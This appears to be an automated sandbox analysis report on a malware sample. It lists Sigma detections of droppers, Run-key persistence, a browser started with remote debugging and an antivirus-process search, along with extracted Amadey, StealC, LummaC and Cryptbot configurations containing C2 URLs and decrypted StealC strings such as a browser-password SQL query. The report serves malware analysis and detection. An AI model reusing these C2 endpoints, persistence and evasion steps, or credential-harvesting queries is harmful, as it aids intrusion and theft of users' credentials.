Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", ProcessId: 6844, ProcessName: wscript.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe, ParentProcessId: 7260, ParentProcessName: Offnewhere.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 4196, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\1001471001\c8908bf20d.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 8068, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c8908bf20d.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Jurisdiction.pif T, CommandLine: Jurisdiction.pif T, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1168, ParentProcessName: cmd.exe, ProcessCommandLine: Jurisdiction.pif T, ProcessId: 7552, ProcessName: Jurisdiction.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe, ParentProcessId: 7300, ParentProcessName: splwow64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ProcessId: 1168, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5740, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , ProcessId: 7468, ProcessName: axplong.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", ProcessId: 6844, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, ProcessId: 4040, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe, ProcessId: 2348, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1168, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 2992, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1313486
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Avira: detection malicious, Label: TR/AD.Stealc.cucnc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe	Avira: detection malicious, Label: TR/AD.Stealc.cucnc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 17.2.stealc_default2.exe.770000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: 17.2.stealc_default2.exe.770000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: RDX123456.exe.5292.48.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["computeryrati.site", "faulteyotk.site", "contemteny.site", "authorisev.site", "servicedny.site", "goalyfeastz.site", "opposezmny.site", "seallysl.site", "dilemmadu.site"], "Build id": "4SD0y4--RLREBORN"}
Source: Offnewhere.exe.7260.18.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["sevjoi17sr.top", "home.sevjoi17sr.top", "0/80/home.sevjoi17sr.top"]}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.17/2fb6c2cc8dce150a.phpro

Virustotal: Detection: 18%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\LgAmARwZ\Application.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\LgAmARwZ\Application.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 01
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 03
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 20
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 25
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetProcAddress
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: LoadLibraryA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: lstrcatA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: OpenEventA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CreateEventA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CloseHandle
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Sleep
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: VirtualFree
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetSystemInfo
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: VirtualAlloc
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: HeapAlloc
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetComputerNameA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: lstrcpyA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetProcessHeap
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetCurrentProcess
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: lstrlenA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ExitProcess
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetSystemTime
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: advapi32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: gdi32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: user32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: crypt32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ntdll.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetUserNameA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CreateDCA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetDeviceCaps
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ReleaseDC
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sscanf
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: VMwareVMware
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: HAL9TH
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: JohnDoe
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: DISPLAY
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: http://185.215.113.17
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 00x00
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: !\|
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: /2fb6c2cc8dce150a.php
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: /f1ddeb6592c03206/
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: default_valenciga
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetFileAttributesA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GlobalLock
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: HeapFree
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetFileSize
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GlobalSize
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: IsWow64Process
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Process32Next
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetLocalTime
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: FreeLibrary
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetVolumeInformationA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Process32First
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetLocaleInfoA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetModuleFileNameA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: DeleteFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: FindNextFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: LocalFree
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: FindClose
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: LocalAlloc
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetFileSizeEx
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ReadFile
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SetFilePointer
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: WriteFile
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CreateFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: FindFirstFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CopyFileA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: VirtualProtect
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetLastError
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: lstrcpynA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: MultiByteToWideChar
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GlobalFree
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: WideCharToMultiByte
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GlobalAlloc
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: OpenProcess
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: TerminateProcess
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetCurrentProcessId
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: gdiplus.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ole32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: bcrypt.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: wininet.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: shlwapi.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: shell32.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: psapi.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: rstrtmgr.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SelectObject
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: BitBlt
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: DeleteObject
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CreateCompatibleDC
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GdiplusStartup
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GdiplusShutdown
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GdipDisposeImage
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GdipFree
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CoUninitialize
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CoInitialize
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CoCreateInstance
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: BCryptDecrypt
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: BCryptSetProperty
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: BCryptDestroyKey
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetWindowRect
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetDesktopWindow
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetDC
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CloseWindow
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: wsprintfA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CharToOemW
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: wsprintfW
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RegQueryValueExA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RegEnumKeyExA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RegOpenKeyExA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RegCloseKey
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RegEnumValueA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CryptUnprotectData
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SHGetFolderPathA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ShellExecuteExA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: InternetOpenUrlA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: InternetConnectA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: InternetCloseHandle
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: InternetOpenA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: HttpSendRequestA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: HttpOpenRequestA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: InternetReadFile
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: InternetCrackUrlA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: StrCmpCA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: StrStrA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: StrCmpCW
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: PathMatchSpecA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RmStartSession
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RmRegisterResources
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RmGetList
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: RmEndSession
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3_open
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3_step
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3_column_text
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3_finalize
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3_close
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3_column_blob
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: encrypted_key
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: PATH
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: NSS_Init
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: NSS_Shutdown
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: PK11_FreeSlot
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: PK11_Authenticate
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: C:\ProgramData\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: browser:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: profile:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: url:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: login:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: password:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Opera
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: OperaGX
